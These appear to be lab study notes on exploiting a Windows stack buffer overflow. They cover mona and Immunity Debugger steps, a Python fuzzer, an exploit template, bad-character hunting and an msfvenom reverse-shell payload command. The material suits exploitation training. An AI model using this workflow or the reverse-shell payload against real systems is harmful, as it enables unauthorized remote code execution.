Step 1: Start immunity with admin permissions.
Step 2: Attach or open the desired application and put it into running state
binary opens in a paused state ;
How to set working path in Immunity Debugger ?
!mona config -set workingfolder c:\mona\%p
On Attacker Machine aka Kali
Step 1: Do Port Scan and Identify Target Port
Step 2: nc ip port
and check out the command options ; modify fuzzer script prefix accordingly
Step 3: run the fuzzer ; wait for it to give you the crashing bytes add 400 to the no.
python fuzzer.py
for example program crached at 200 bytes
Step 4: usr share metasploit tools exploit pattern create -l 600
Step 5: modify exploit py and put the pattern in overflow variable ; run the script ; observe the EIP
!mona findmsp -distance 600
basically the length of pattern you created
this will output you the offset
you can double check it with follwing ::
└─$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 76413176
^^ value of eip after crash with pattern
Step 6: Confirm Offset
by setting offset value in exploit py sending length of A
follwed by retn or eip value as “BBBB”
pbserve eip 42424242
if true the offset is correct
Step 7: Find Bad Chars [ the fastest n easiest way ]
generate a byte array excluding null byte
null byte is always a bad char
!mona bytearray -b "\x00"
use python script to generate a badchar on attacking machine as well Check appendix
now send the byte array in payload section of python exploit ...
crash and then check for badchars
crach and check the value of esp = [copy this value]
and run this command to check bad chars
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressof esp>
!mona compare -f C:\mona\oscp\bytearray.bin -a
0188FA30
esp = 0188FA30
only keep the first char if badchars are in consecutive sequence .
rinse n repeat
update the payload variable and remove the new badchars from the py exploit
create new badcahr array using mona module again
!mona bytearray -b “\x00\x23\x3c\x83\xba”
rerun the exploit -→ crash the app --> and again check the esp and re run the follwing
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressof esp>
!mona compare -f C:\mona\oscp\bytearray.bin -a
0193FA30
Find jmp esp
after crashing or before crashing [does not matter ] mention all your badchars after -cpb paramter
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
^^^^here goes all your badchars
keep a address of jmp esp -→ save it in reverse order in retn / eip value in exploit .py
generate your shell code using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
paste the output in payload section like
payload = ("adfadfa"
“adadfa”
“afdawfda”
“awdfawdf”)
set nops somewhere between 12-16-20
nop = “\x90” * 16
Fuzzer python3 script
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket, time, sys
ip = "MACHINE_IP"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
Exploit.py
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
#!/usr/bin/env python3
import socket
ip = "MACHINE_IP"
port = 1337
prefix = "OVERFLOW1 "
offset = 0
#this is your junk
overflow = "A" * offset
#this is eip enter it in reverse
retn = ""
#this is nop sledge
padding = ""
#here goes your shellcode in c format
payload = ""
#remaining bytes from total
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
python badchar create
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')
print()
---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---